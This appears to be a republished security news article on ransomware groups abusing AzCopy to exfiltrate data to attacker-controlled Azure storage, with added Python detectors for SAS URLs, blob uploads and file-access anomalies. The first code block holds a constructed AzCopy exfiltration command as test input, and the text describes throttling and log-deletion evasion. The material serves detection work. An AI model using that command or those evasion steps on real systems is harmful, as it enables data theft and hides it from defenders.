AzCopy Utility Misused for Data Exfiltration in Ongoing Ransomware Attacks

Introduction

Ransomware operators are increasingly abusing Microsoft’s trusted Azure data transfer utility, AzCopy, to quietly exfiltrate sensitive data before encryption. This shift turns a routine cloud migration tool into a stealthy theft channel, making it difficult for traditional detection methods to identify the malicious activity.

AzCopy: A Trusted Utility Turned Malicious

AzCopy is a command-line utility designed to move large volumes of data to and from Azure Storage. It is commonly used by enterprises for backup, migration, and large-scale data operations. Due to its widespread trust and minimal monitoring, AzCopy has become an attractive tool for ransomware groups to use for data exfiltration.

Ransomware Groups Leveraging AzCopy

Threat actors are using AzCopy and Azure Storage Explorer to bulk-upload stolen files from breached networks into attacker-controlled Azure Blob storage. This technique allows ransomware groups like BianLian and Rhysida to treat Microsoft’s cloud as their exfiltration staging ground.

How Attackers Exploit AzCopy

Attackers typically obtain valid Azure credentials or storage keys and generate Shared Access Signature (SAS) tokens to access storage accounts without interactive logins. A SAS URL embeds all required permissions, time windows, and target containers, allowing a single AzCopy command to stream large datasets straight into an external blob container.
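The SAS URL is the artefact a defender is most likely to recover from process-creation telemetry, and the query string carries everything needed to judge it: the permissions (sp), the validity window (st/se), and whether it is an account-level SAS (ss/srt) or scoped to a single container (sr). The following triage routine is an added example, not code from the article: it takes a constructed AzCopy command line (made-up storage account, container and placeholder signature) and reports the properties that should draw an analyst's attention.

```python
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed sample: an AzCopy invocation as it might be recorded in process-creation
# telemetry. Storage account, container and SAS parameter values are made up; the
# signature is a placeholder, not a valid HMAC.
SAMPLE_CMDLINE = (
    'azcopy.exe copy "D:\\Finance\\" '
    '"https://examplestore.blob.core.windows.net/exfil'
    '?sv=2022-11-02&ss=b&srt=sco&sp=rwdlac'
    '&st=2025-01-01T00:00:00Z&se=2025-12-31T23:59:59Z&spr=https'
    '&sig=PLACEHOLDER_SIGNATURE" --recursive --cap-mbps 5'
)


def _parse_time(value):
    """SAS times are ISO 8601 in UTC, either a full timestamp or a bare date."""
    if not value:
        return None
    ts = datetime.fromisoformat(value.replace("Z", "+00:00"))
    return ts if ts.tzinfo else ts.replace(tzinfo=timezone.utc)


def extract_sas_urls(cmdline):
    """Return every URL on the command line that carries a SAS signature (sig=)."""
    urls = re.findall(r"""https://[^\s"']+""", cmdline)
    return [u for u in urls if "sig" in parse_qs(urlsplit(u).query)]


def parse_sas(url):
    """Break a SAS URL into the fields an analyst needs to assess it."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    host = parts.hostname or ""
    if "ss" in q or "srt" in q:
        kind = "account"          # account SAS: ss/srt scope it to services and resource types
    elif "skoid" in q:
        kind = "user-delegation"  # user-delegation SAS carries the delegating identity (skoid)
    else:
        kind = "service"          # service SAS: sr names the single container or blob
    return {
        "host": host,
        "account": host.split(".")[0],
        "path": parts.path.strip("/"),
        "permissions": q.get("sp", ""),
        "kind": kind,
        "start": _parse_time(q.get("st")),
        "expiry": _parse_time(q.get("se")),
    }


def assess_sas(sas, now=None):
    """Return human-readable findings that make this SAS worth an analyst's attention."""
    now = now or datetime.now(timezone.utc)
    findings = []
    perms = set(sas["permissions"])
    if perms & set("wac"):
        findings.append("grants upload rights (write/add/create)")
    if "d" in perms:
        findings.append("grants delete rights")
    if sas["kind"] == "account":
        findings.append("account-level SAS, not scoped to a single container")
    if sas["expiry"]:
        hours = (sas["expiry"] - (sas["start"] or now)).total_seconds() / 3600
        if hours > 24:
            findings.append(f"validity window of {hours:.0f} hours exceeds 24h")
    return findings


def cap_mbps(cmdline):
    """Return the --cap-mbps value if the transfer was deliberately throttled, else None."""
    m = re.search(r"--cap-mbps[ =](\d+(?:\.\d+)?)", cmdline)
    return float(m.group(1)) if m else None


def review_command_line(cmdline, now=None):
    """Triage one AzCopy command line: which SAS URLs it carries and why they matter."""
    report = {"cap_mbps": cap_mbps(cmdline), "targets": []}
    for url in extract_sas_urls(cmdline):
        sas = parse_sas(url)
        report["targets"].append({"sas": sas, "findings": assess_sas(sas, now)})
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(review_command_line(SAMPLE_CMDLINE), indent=2, default=str))
```

Run against the constructed line, the report names the destination storage account (useful for an abuse report to the provider), flags the account-level scope, the write and delete rights, the near-year-long validity window, and the explicit 5 Mbps throttle.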

Techniques to Avoid Detection

  • Using the --cap-mbps flag to intentionally throttle transfer throughput, keeping traffic volumes stable and less suspicious on monitoring dashboards.
  • Restricting which files are copied using include/exclude patterns and time-based filters, focusing on recent, high-value documents while minimizing noise.

These techniques make it difficult for security tools to detect the exfiltration activity, as the destination is a fully legitimate cloud provider and the channel is standard HTTPS to domains like *.blob.core.windows.net, which are often broadly allowed through firewalls and proxies.
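Because the destination is a legitimate endpoint and the rate is deliberately capped, per-request or per-rate rules on the proxy see nothing unusual; what stands out is the cumulative upload volume from a host that has no business talking to Blob storage. The detection below is an added example, not from the article or any product: it runs over constructed proxy log lines (made-up hosts, storage accounts and byte counts) and aggregates bytes sent to *.blob.core.windows.net per source host, alerting on hosts outside a small reviewed set of known cloud-storage systems.

```python
from datetime import datetime

# Constructed proxy/egress log lines in the form
# "<utc timestamp> <source host> <destination host> <method> <bytes sent>".
# Hosts, storage account names and volumes are made up for the example.
SAMPLE_PROXY_LOG = """\
2025-06-01T01:00:00Z fileserver01 examplestore.blob.core.windows.net PUT 375000000
2025-06-01T01:10:00Z fileserver01 examplestore.blob.core.windows.net PUT 375000000
2025-06-01T01:20:00Z fileserver01 examplestore.blob.core.windows.net PUT 375000000
2025-06-01T01:30:00Z fileserver01 examplestore.blob.core.windows.net PUT 375000000
2025-06-01T01:40:00Z fileserver01 examplestore.blob.core.windows.net PUT 375000000
2025-06-01T01:50:00Z fileserver01 examplestore.blob.core.windows.net PUT 375000000
2025-06-01T02:00:00Z backup01 corpbackup.blob.core.windows.net PUT 5000000000
2025-06-01T02:05:00Z wks-042 examplestore.blob.core.windows.net GET 2048
2025-06-01T02:07:00Z wks-042 corpbackup.blob.core.windows.net PUT 50000000
2025-06-01T02:09:00Z wks-042 update.example.com GET 4096
"""

# Systems expected to talk to Azure Storage (backup and migration hosts); reviewed and kept small.
KNOWN_CLOUD_STORAGE_HOSTS = {"backup01"}
BLOB_SUFFIX = ".blob.core.windows.net"
UPLOAD_METHODS = {"PUT", "POST", "PATCH"}  # blob writes use PUT; the others cover remaining write paths


def parse_proxy_line(line):
    ts, src, dst, method, sent = line.split()
    return {
        "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "src": src,
        "dst": dst,
        "method": method,
        "bytes_sent": int(sent),
    }


def summarize_blob_uploads(log_text):
    """Aggregate bytes uploaded to Blob endpoints per (source host, destination host)."""
    totals = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_proxy_line(line)
        if not rec["dst"].endswith(BLOB_SUFFIX) or rec["method"] not in UPLOAD_METHODS:
            continue
        key = (rec["src"], rec["dst"])
        s = totals.setdefault(key, {"bytes": 0, "requests": 0, "first": rec["ts"], "last": rec["ts"]})
        s["bytes"] += rec["bytes_sent"]
        s["requests"] += 1
        s["first"] = min(s["first"], rec["ts"])
        s["last"] = max(s["last"], rec["ts"])
    return totals


def flag_unexpected_uploads(totals, known_hosts=KNOWN_CLOUD_STORAGE_HOSTS, min_bytes=1_000_000_000):
    """Alert on hosts outside the known set whose cumulative uploads exceed min_bytes.

    Cumulative volume is the point: a throttled transfer shows only a modest average
    rate on a bandwidth graph yet still adds up to gigabytes within an hour.
    """
    alerts = []
    for (src, dst), s in totals.items():
        if src in known_hosts or s["bytes"] < min_bytes:
            continue
        span = max((s["last"] - s["first"]).total_seconds(), 1.0)
        alerts.append({
            "src": src,
            "dst": dst,
            "gib": round(s["bytes"] / 2**30, 2),
            "requests": s["requests"],
            "avg_mbps": round(s["bytes"] * 8 / span / 1e6, 1),
        })
    return alerts


if __name__ == "__main__":
    for alert in flag_unexpected_uploads(summarize_blob_uploads(SAMPLE_PROXY_LOG)):
        print(alert)
```

On the constructed data the file server's uploads average only about 6 Mbps, well inside what a dashboard would treat as background noise, yet reach roughly 2 GiB within the hour and trigger the alert; the known backup host and the workstation's small transfer do not.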

Challenges in Detection and Response

In some real-world incidents, AzCopy-driven exfiltration went completely undetected by endpoint security tools, leaving it to specialized data security platforms and forensic analysis to reconstruct what was stolen. Even when Azure logging is enabled, threat actors may attempt to cover their tracks by deleting the local %USERPROFILE%\.azcopy logging directory after completing transfers.

Strategies to Mitigate AzCopy-Driven Exfiltration

Security teams must adopt a data-centric security strategy to map where sensitive data lives, who can access it, and what normal access and movement patterns look like. This approach ensures that deviations, such as a reporting account suddenly reading hundreds of thousands of files, generate high-fidelity alerts.
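A baseline of normal access per account is what turns "hundreds of thousands of files" from a number into an alert. The routine below is an added example, not the article's or any vendor's code: it takes constructed per-account daily read counts (hypothetical accounts, made-up numbers) and uses a median/MAD score, which is robust to an occasional busy day, together with a minimum ratio against the daily median, so that a backup account that legitimately reads everything every night is not flagged while a reporting account that suddenly reads two hundred times its norm is.

```python
from statistics import median

# Constructed baseline: distinct files read per day by each account over the previous
# 14 days, as it could be derived from file-server audit logs. Accounts and counts are made up.
BASELINE_DAILY_READS = {
    "svc-reporting": [1150, 1210, 1180, 1305, 1190, 1220, 1175,
                      1260, 1200, 1195, 1230, 1185, 1215, 1205],
    "svc-backup": [410000, 405000, 415000, 408000, 411000, 404000, 409000,
                   413000, 407000, 410000, 406000, 412000, 405000, 409000],
    "jdoe": [35, 40, 28, 51, 33, 39, 30, 44, 37, 36, 41, 29, 38, 35],
}
# Constructed counts for the current day; svc-newapp has no history at all.
TODAY_READS = {"svc-reporting": 240000, "svc-backup": 412000, "jdoe": 38, "svc-newapp": 90000}


def robust_score(history, value):
    """Median/MAD score: how many robust standard deviations today's value sits above the norm."""
    med = median(history)
    mad = median(abs(x - med) for x in history) or 1.0  # guard against a perfectly flat history
    return (value - med) / (1.4826 * mad), med


def flag_access_anomalies(baseline, today, score_threshold=10.0, ratio_threshold=10.0):
    """Return one alert per account whose read volume today deviates sharply from its baseline.

    An account with no baseline is surfaced too: a fresh identity reading tens of
    thousands of files is exactly the case a data-centric view should not ignore.
    """
    alerts = []
    for account, count in today.items():
        history = baseline.get(account)
        if not history:
            alerts.append({"account": account, "today": count,
                           "reason": "no baseline for this account"})
            continue
        score, med = robust_score(history, count)
        if score >= score_threshold and count >= ratio_threshold * med:
            alerts.append({"account": account, "today": count, "median": med,
                           "score": round(score),
                           "reason": f"{count} files read against a daily median of {med:.0f}"})
    return alerts


if __name__ == "__main__":
    for alert in flag_access_anomalies(BASELINE_DAILY_READS, TODAY_READS):
        print(alert)
```

In practice the baseline would be rebuilt continuously from audit logs and keyed by account and data store rather than account alone, but the two conditions shown (a large robust score and a large ratio to the median) are what keep the alert high-fidelity.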

Implementing Effective Monitoring and Control

  • Using User and Entity Behavior Analytics (UEBA) to flag abnormal file access and AzCopy usage by service or privileged accounts.
  • Restricting direct internet access from servers to only known update and security endpoints.
  • Scrutinizing connections to Azure Blob endpoints from systems that normally do not interact with cloud storage.
  • Implementing application control policies to tightly scope where AzCopy is allowed to run and under which accounts.

Incident Response Planning

Incident response plans should explicitly address cloud-based exfiltration scenarios, including how to quickly revoke SAS tokens, rotate keys, isolate affected systems, and coordinate takedown or abuse reports with cloud providers.

Conclusion

As attackers increasingly weaponize legitimate cloud tools like AzCopy, organizations must monitor their own trusted utilities to prevent sensitive data from being delivered into ransomware operators’ hands.


元記事: https://gbhackers.com/azcopy-utility-misused/